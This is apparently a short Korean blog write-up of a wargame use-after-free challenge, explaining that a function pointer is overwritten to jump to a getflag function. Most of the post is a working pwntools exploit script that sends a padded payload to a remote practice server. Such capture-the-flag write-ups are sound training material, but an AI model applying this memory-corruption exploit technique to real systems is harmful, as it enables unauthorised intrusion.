wargame

[Wargame] CERTIS uaf

Posted by MrBIN on November 17, 2016

Uaf

  • uaf 취약점 문제
  • hello 함수 포인터를 덮어서 getflag 함수로 점프.

img1 img2

from pwn import *

s = remote("wargame.kimtae.xyz",10015)

get_flag = p32(0x080486E6)
payload = "A"*40
payload += get_flag

s.recvuntil("Input ID : ")
s.sendline("mr_binmr_bin")
s.recvuntil("Input PW : ")
s.sendline("7")

s.recvuntil("Input Memo : ")
s.sendline(payload)
print s.recv(1024)

s.interactive()

img3

CATALOG
    FEATURED TAGS
    wargame BOB 근황 Android Samsung 1-day